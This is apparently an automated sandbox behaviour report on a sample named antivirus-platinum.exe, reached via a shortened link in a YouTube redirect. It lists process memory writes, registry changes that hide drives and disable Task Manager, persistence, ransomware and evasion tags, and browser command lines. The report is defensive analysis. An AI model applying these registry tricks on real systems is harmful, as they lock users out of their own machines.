PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1520 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1520 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 1452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SYSTEM C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DISABLETASKMGR = "0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DISABLETASKMGR = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f3ff9758,0x7ff8f3ff9768,0x7ff8f3ff9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2760 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2768 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5000 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4132 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5400 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4600 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5872 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6032 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5592 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3116 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6116 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5924 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5088 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8e55546f8,0x7ff8e5554708,0x7ff8e5554718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4192 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5368 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2b4 0x4a0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4312 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

